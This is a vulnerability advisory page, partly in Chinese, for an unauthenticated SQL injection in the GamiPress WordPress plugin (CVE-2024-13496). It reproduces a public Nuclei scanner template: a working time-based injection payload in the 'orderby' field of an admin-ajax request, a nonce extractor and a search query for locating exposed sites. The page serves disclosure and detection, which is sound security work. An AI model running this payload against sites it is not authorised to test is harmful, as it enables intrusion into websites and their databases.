CVE-2024-13496: GamiPress <= 2.8.9 - SQL Injection

日期: 2025-08-01 | 影响软件: GamiPress | POC: 已公开

漏洞描述

GamiPress WordPress plugin version 2.8.9 and below suffers from an SQL injection vulnerability due to insufficient sanitization of user input, allowing attackers to execute arbitrary SQL commands.

PoC代码[已公开]

id: CVE-2024-13496

info:
  name: GamiPress <= 2.8.9 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    GamiPress WordPress plugin version 2.8.9 and below suffers from an SQL injection vulnerability due to insufficient sanitization of user input, allowing attackers to execute arbitrary SQL commands.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands to extract, modify, or delete database contents, potentially compromising the entire WordPress installation.
  remediation: |
    Update GamiPress plugin to version 2.8.10 or later.
  reference:
    - https://abrahack.com/posts/gamipress-sqli/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13496
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-13496
    cwe-id: CWE-89
    epss-score: 0.40342
    epss-percentile: 0.97232
  metadata:
    max-requests: 2
    fofa-query: body="/wp-content/plugins/gamipress"
  tags: cve,cve2024,wp,wordpress,gamipress,sqli,wp-plugin,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 30s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=WebKitFormBoundaryPzS34wz7rAyyJYSi

        ------WebKitFormBoundaryPzS34wz7rAyyJYSi
        Content-Disposition: form-data; name="action"

        gamipress_get_logs
        ------WebKitFormBoundaryPzS34wz7rAyyJYSi
        Content-Disposition: form-data; name="nonce"

        {{nonce}}
        ------WebKitFormBoundaryPzS34wz7rAyyJYSi
        Content-Disposition: form-data; name="orderby"

        (SELECT/**/sleep(8)/**/FROM/**/dual/**/WHERE/**/1/**/LIKE/**/1)#
        ------WebKitFormBoundaryPzS34wz7rAyyJYSi--

    matchers:
      - type: dsl
        dsl:
          - 'duration>= 8'
          - 'status == 200'
          - 'contains(headers, "application/json")'
          - 'contains(body, "success\":true")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: nonce
        group: 1
        regex:
          - '"nonce":"([0-9a-z]+)"'
        internal: true
# digest: 4a0a00473045022100f388253b51a3e10dc49b36bc3baff9eec7565fb9749ea43d42d1fae8b54b2d35022018344e578b3d3535609965ab159522cb95766c6c4ef9d048ed10e6f8fedb2dc9:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-13496.yaml

相关漏洞推荐